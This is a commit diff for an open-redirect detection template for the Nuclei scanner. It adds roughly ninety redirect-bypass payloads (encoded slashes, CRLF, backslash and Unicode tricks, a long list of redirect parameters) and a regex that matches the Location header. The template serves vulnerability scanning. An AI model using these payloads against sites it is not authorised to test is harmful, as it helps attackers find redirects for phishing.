Update open-redirect.yaml (#3404)
* Update open-redirect.yaml add new payloads * minor update Co-authored-by: sandeep <sandeep@projectdiscovery.io>patch-1
Emad Youssef
GitHub
parent
e8f240d296
commit
ce7b60d79c
|
|
@ -8,45 +8,115 @@ info:
|
|||
tags: redirect,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
- raw:
|
||||
- |
|
||||
GET /{{redirect}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
path:
|
||||
- '{{BaseURL}}/example.com/'
|
||||
- '{{BaseURL}}/example.com//'
|
||||
- '{{BaseURL}}///;@example.com'
|
||||
- '{{BaseURL}}///example.com/%2F..'
|
||||
- '{{BaseURL}}/////example.com'
|
||||
- '{{BaseURL}}//example.com/%2F..'
|
||||
- '{{BaseURL}}//example.com/..;/css'
|
||||
- '{{BaseURL}}/example%E3%80%82com'
|
||||
- '{{BaseURL}}/%5Cexample.com'
|
||||
- '{{BaseURL}}/example.com'
|
||||
- '{{BaseURL}}//example.com/'
|
||||
- '{{BaseURL}}/%00/example.com/'
|
||||
- '{{BaseURL}}/%09/example.com/'
|
||||
- '{{BaseURL}}/%0a/example.com/'
|
||||
- '{{BaseURL}}/%0d/example.com/'
|
||||
- '{{BaseURL}}////example.com/%2f%2e%2e'
|
||||
- '{{BaseURL}}/%5cexample.com/%2f%2e%2e'
|
||||
- '{{BaseURL}}/%5C%5Cexample.com/%252e%252e%252f'
|
||||
- '{{BaseURL}}/{{BaseURL}}example.com'
|
||||
- '{{BaseURL}}//{{BaseURL}}example.com/'
|
||||
- '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e'
|
||||
- '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e'
|
||||
- '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
|
||||
- '{{BaseURL}}/1/_https@example.com'
|
||||
payloads:
|
||||
redirect:
|
||||
- '%0a/example.com/'
|
||||
- '%0d/example.com/'
|
||||
- '%00/example.com/'
|
||||
- '%09/example.com/'
|
||||
- '%5C%5Cexample.com/%252e%252e%252f'
|
||||
- '%5Cexample.com'
|
||||
- '%5cexample.com/%2f%2e%2e'
|
||||
- '%5c{{RootURL}}example.com/%2f%2e%2e'
|
||||
- '../example.com'
|
||||
- '.example.com'
|
||||
- '/%5cexample.com'
|
||||
- '////\;@example.com'
|
||||
- '////example.com'
|
||||
- '///example.com'
|
||||
- '///example.com/%2f%2e%2e'
|
||||
- '///example.com@//'
|
||||
- '///{{RootURL}}example.com/%2f%2e%2e'
|
||||
- '//;@example.com'
|
||||
- '//\/example.com/'
|
||||
- '//\@example.com'
|
||||
- '//\example.com'
|
||||
- '//\texample.com/'
|
||||
- '//example.com/%2F..'
|
||||
- '//example.com//'
|
||||
- '//example.com@//'
|
||||
- '//example.com\texample.com/'
|
||||
- '//https://example.com@//'
|
||||
- '/<>//example.com'
|
||||
- '/\/\/example.com/'
|
||||
- '/\/example.com'
|
||||
- '/\example.com'
|
||||
- '/example.com'
|
||||
- '/example.com/%2F..'
|
||||
- '/example.com/'
|
||||
- '/example.com/..;/css'
|
||||
- '/https:example.com'
|
||||
- '/{{RootURL}}example.com/'
|
||||
- '/〱example.com'
|
||||
- '/〵example.com'
|
||||
- '/ゝexample.com'
|
||||
- '/ーexample.com'
|
||||
- '/ーexample.com'
|
||||
- '<>//example.com'
|
||||
- '@example.com'
|
||||
- '@https://example.com'
|
||||
- '\/\/example.com/'
|
||||
- 'example%E3%80%82com'
|
||||
- 'example.com'
|
||||
- 'example.com/'
|
||||
- 'example.com//'
|
||||
- 'example.com;@'
|
||||
- 'https%3a%2f%2fexample.com%2f'
|
||||
- 'https:%0a%0dexample.com'
|
||||
- 'https://%0a%0dexample.com'
|
||||
- 'https://%09/example.com'
|
||||
- 'https://%2f%2f.example.com/'
|
||||
- 'https://%3F.example.com/'
|
||||
- 'https://%5c%5c.example.com/'
|
||||
- 'https://%5cexample.com@'
|
||||
- 'https://%23.example.com/'
|
||||
- 'https://.example.com'
|
||||
- 'https://////example.com'
|
||||
- 'https:///example.com'
|
||||
- 'https:///example.com/%2e%2e'
|
||||
- 'https:///example.com/%2f%2e%2e'
|
||||
- 'https:///example.com@example.com/%2e%2e'
|
||||
- 'https:///example.com@example.com/%2f%2e%2e'
|
||||
- 'https://:80#@example.com/'
|
||||
- 'https://:80?@example.com/'
|
||||
- 'https://:@\@example.com'
|
||||
- 'https://:@example.com\@example.com'
|
||||
- 'https://:@example.com\@WillBeReplaced.com'
|
||||
- 'https://;@example.com'
|
||||
- 'https://\texample.com/'
|
||||
- 'https://example.com/example.com'
|
||||
- 'https://example.com/https://example.com/'
|
||||
- 'https://www.\.example.com'
|
||||
- 'https:/\/\example.com'
|
||||
- 'https:/\example.com'
|
||||
- 'https:/example.com'
|
||||
- 'https:example.com'
|
||||
- '{{RootURL}}example.com'
|
||||
- '〱example.com'
|
||||
- '〵example.com'
|
||||
- 'ゝexample.com'
|
||||
- 'ーexample.com'
|
||||
- 'ーexample.com'
|
||||
- '?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 301
|
||||
- 302
|
||||
- 307
|
||||
- 308
|
||||
- 308
|
||||
condition: or
|
||||
Loading…
Reference in New Issue